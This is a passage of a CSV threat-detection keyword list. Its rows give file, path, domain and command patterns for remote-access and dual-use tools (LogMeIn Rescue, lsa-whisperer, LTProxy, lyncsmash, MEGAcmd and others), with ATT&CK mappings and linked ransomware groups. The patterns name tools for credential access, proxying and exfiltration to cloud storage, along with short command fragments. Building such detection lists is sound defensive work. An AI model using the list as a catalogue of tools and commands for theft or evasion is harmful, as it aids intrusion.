Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\LogMeInRescue_ipc*",".{0,1000}\\LogMeInRescue_ipc.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A" "*\LogMeInRescue_rarc_r_*",".{0,1000}\\LogMeInRescue_rarc_r_.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A" "*\LogMeInRescue_rarc_w_*",".{0,1000}\\LogMeInRescue_rarc_w_.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A" "*\LogMeInRescueTechnicianConsole_x64*",".{0,1000}\\LogMeInRescueTechnicianConsole_x64.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - 
Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\LogMeIn\*",".{0,1000}\\ProgramData\\LogMeIn\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ractrlkeyhook.dll*",".{0,1000}\\ractrlkeyhook\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RescueWinRTLib.dll*",".{0,1000}\\RescueWinRTLib\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RescueWinRTLib.dll*",".{0,1000}\\RescueWinRTLib\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\Root\InventoryApplicationFile\support-logmeinr*",".{0,1000}\\Root\\InventoryApplicationFile\\support\-logmeinr.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RunOnce\*LogMeInRescue_*",".{0,1000}\\RunOnce\\.{0,1000}LogMeInRescue_.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Software\LogMeInRescue\*",".{0,1000}\\Software\\LogMeInRescue\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Start Menu\Programs\LogMeIn Rescue\*",".{0,1000}\\Start\sMenu\\Programs\\LogMeIn\sRescue\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Start 
Menu\Programs\LogMeIn*",".{0,1000}\\Start\sMenu\\Programs\\LogMeIn.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*LogMeIn, Inc.*",".{0,1000}\LogMeIn,\sInc\.\<\/Data\>.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*9d2ce0345f4ee5798a49a8a13e33c7502a2ac655*",".{0,1000}9d2ce0345f4ee5798a49a8a13e33c7502a2ac655.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*control.*.logmeinrescue.com*",".{0,1000}control\..{0,1000}\.logmeinrescue\.com.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*control.rsc-app*.logmeinrescue.com",".{0,1000}control\.rsc\-app.{0,1000}\.logmeinrescue\.com","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://secure.logmeinrescue.com/R?i=2&Code=*",".{0,1000}https\:\/\/secure\.logmeinrescue\.com\/R\?i\=2\&Code\=.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://secure.logmeinrescue.com/TechnicianConsole/Launch*",".{0,1000}https\:\/\/secure\.logmeinrescue\.com\/TechnicianConsole\/Launch.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*LMI_RescueRC.exe*",".{0,1000}LMI_RescueRC\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - 
Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*LMIGuardianDll.dll*",".{0,1000}LMIGuardianDll\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*LMIGuardianSvc.exe*",".{0,1000}LMIGuardianSvc\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*LogMeIn Rescue Technician Console.lnk*",".{0,1000}LogMeIn\sRescue\sTechnician\sConsole\.lnk.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*LogMeInRescueTechnicianConsoleApp.msi*",".{0,1000}LogMeInRescueTechnicianConsoleApp\.msi.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - 
Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Support-LogMeInRescue.exe*",".{0,1000}Support\-LogMeInRescue\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Support-LogMeInRescue.exe*",".{0,1000}Support\-LogMeInRescue\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SUPPORT-LOGMEINRESCUE.EXE-*",".{0,1000}SUPPORT\-LOGMEINRESCUE\.EXE\-.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*turn.console.gotoassist.com*",".{0,1000}turn\.console\.gotoassist\.com.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - 
Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ls \\1*.*.*.*\IPC$\*",".{0,1000}ls\s\\\\1.{0,1000}\..{0,1000}\..{0,1000}\..{0,1000}\\IPC\$\\.{0,1000}","greyware_tool_keyword","ls","list remote pipename ","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://outflank.nl/blog/2023/10/19/listing-remote-named-pipes/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/lsa-whisperer-*.zip*",".{0,1000}\/lsa\-whisperer\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","lsa-whisperer","Tools for interacting with authentication packages using their individual message protocols","T1556.002 - T1003.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/EvanMcBroom/lsa-whisperer","1","1","N/A","N/A","6","3","282","26","2024-08-26T15:53:54Z","2022-08-04T14:35:45Z" "*/lsa-whisperer.git*",".{0,1000}\/lsa\-whisperer\.git.{0,1000}","greyware_tool_keyword","lsa-whisperer","Tools for interacting with authentication packages using their individual message protocols","T1556.002 - T1003.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/EvanMcBroom/lsa-whisperer","1","1","N/A","N/A","6","3","282","26","2024-08-26T15:53:54Z","2022-08-04T14:35:45Z" "*\lsa-whisperer-*",".{0,1000}\\lsa\-whisperer\-.{0,1000}","greyware_tool_keyword","lsa-whisperer","Tools for interacting with authentication packages using their individual message protocols","T1556.002 - T1003.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/EvanMcBroom/lsa-whisperer","1","0","N/A","N/A","6","3","282","26","2024-08-26T15:53:54Z","2022-08-04T14:35:45Z" "*EvanMcBroom/lsa-whisperer*",".{0,1000}EvanMcBroom\/lsa\-whisperer.{0,1000}","greyware_tool_keyword","lsa-whisperer","Tools for interacting with authentication packages using their individual message protocols","T1556.002 - T1003.001","TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/EvanMcBroom/lsa-whisperer","1","1","N/A","N/A","6","3","282","26","2024-08-26T15:53:54Z","2022-08-04T14:35:45Z" "*/.ltproxy.yml*",".{0,1000}\/\.ltproxy\.yml.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" "*/etc/ltproxy.yml*",".{0,1000}\/etc\/ltproxy\.yml.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" "*/LTProxy.git*",".{0,1000}\/LTProxy\.git.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","1","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" "*/tmp/.ltproxy_proxychains_*",".{0,1000}\/tmp\/\.ltproxy_proxychains_.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" "*\LTProxy-main*","\\LTProxy\-main","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" 
"*ac5f344727467b6ad9743b8ffa2646ed73180dbdb97224feec6c54c5160a1984*",".{0,1000}ac5f344727467b6ad9743b8ffa2646ed73180dbdb97224feec6c54c5160a1984.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#filehash","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" "*ipt2socks -R -n 9999 -j 50 -u * -s * -l *",".{0,1000}ipt2socks\s\-R\s\-n\s9999\s\-j\s50\s\-u\s.{0,1000}\s\-s\s.{0,1000}\s\-l\s.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" "*L-codes/LTProxy*",".{0,1000}L\-codes\/LTProxy.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","1","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" "*ltproxy restart*",".{0,1000}ltproxy\srestart.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" "*ltproxy start*",".{0,1000}ltproxy\sstart.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" "*ltproxy 
stop*",".{0,1000}ltproxy\sstop.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z" "*UCCAPI/16.0.13328.20130 OC/16.0.13426.20234*",".{0,1000}UCCAPI\/16\.0\.13328\.20130\sOC\/16\.0\.13426\.20234.{0,1000}","greyware_tool_keyword","lyncsmash","default user agent used by lyncsmash.py - a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","greyware_tools high risks of false positives","8","4","330","67","2024-06-27T09:47:20Z","2016-05-20T04:32:41Z" "*macchanger -r *",".{0,1000}macchanger\s\-r\s.{0,1000}","greyware_tool_keyword","macchanger","changing mac address with macchanger","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*https://maildrop.cc/inbox/?mailbox=*",".{0,1000}https\:\/\/maildrop\.cc\/inbox\/\?mailbox\=.{0,1000}","greyware_tool_keyword","maildrop","disposable email address to use anytime.","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://maildrop.cc/","1","1","N/A","N/A","4","5","N/A","N/A","N/A","N/A" "*bdlcnpceagnkjnjlbbbcepohejbheilk*",".{0,1000}bdlcnpceagnkjnjlbbbcepohejbheilk.{0,1000}","greyware_tool_keyword","Malus VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" 
"*.userstorage.mega.co.nz/ul/*",".{0,1000}\.userstorage\.mega\.co\.nz\/ul\/.{0,1000}","greyware_tool_keyword","mega.co.nz","uploading data to mega cloud","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* MEGAcmd.sh*",".{0,1000}\sMEGAcmd\.sh.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*$(mega-whoami)*",".{0,1000}\$\(mega\-whoami\).{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*$MEGACMDSHELL*",".{0,1000}\$MEGACMDSHELL.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*%LOCALAPPDATA%\MEGAcmd*",".{0,1000}\%LOCALAPPDATA\%\\MEGAcmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/apache-megacmd.conf*",".{0,1000}\/apache\-megacmd\.conf.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/Applications/MEGAcmd.app*",".{0,1000}\/Applications\/MEGAcmd\.app.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/MEGAclient.exe*",".{0,1000}\/MEGAclient\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - 
T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/MEGAcmd.exe*",".{0,1000}\/MEGAcmd\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/MEGAcmd.sh*",".{0,1000}\/MEGAcmd\.sh.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/MEGAcmdServer.exe*",".{0,1000}\/MEGAcmdServer\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*/MEGAcmdSetup.exe*",".{0,1000}\/MEGAcmdSetup\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/MEGAcmdSetup32.exe*",".{0,1000}\/MEGAcmdSetup32\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/MEGAcmdSetup64.exe*",".{0,1000}\/MEGAcmdSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/MEGAcmdSetup64.exe*",".{0,1000}\/MEGAcmdSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - 
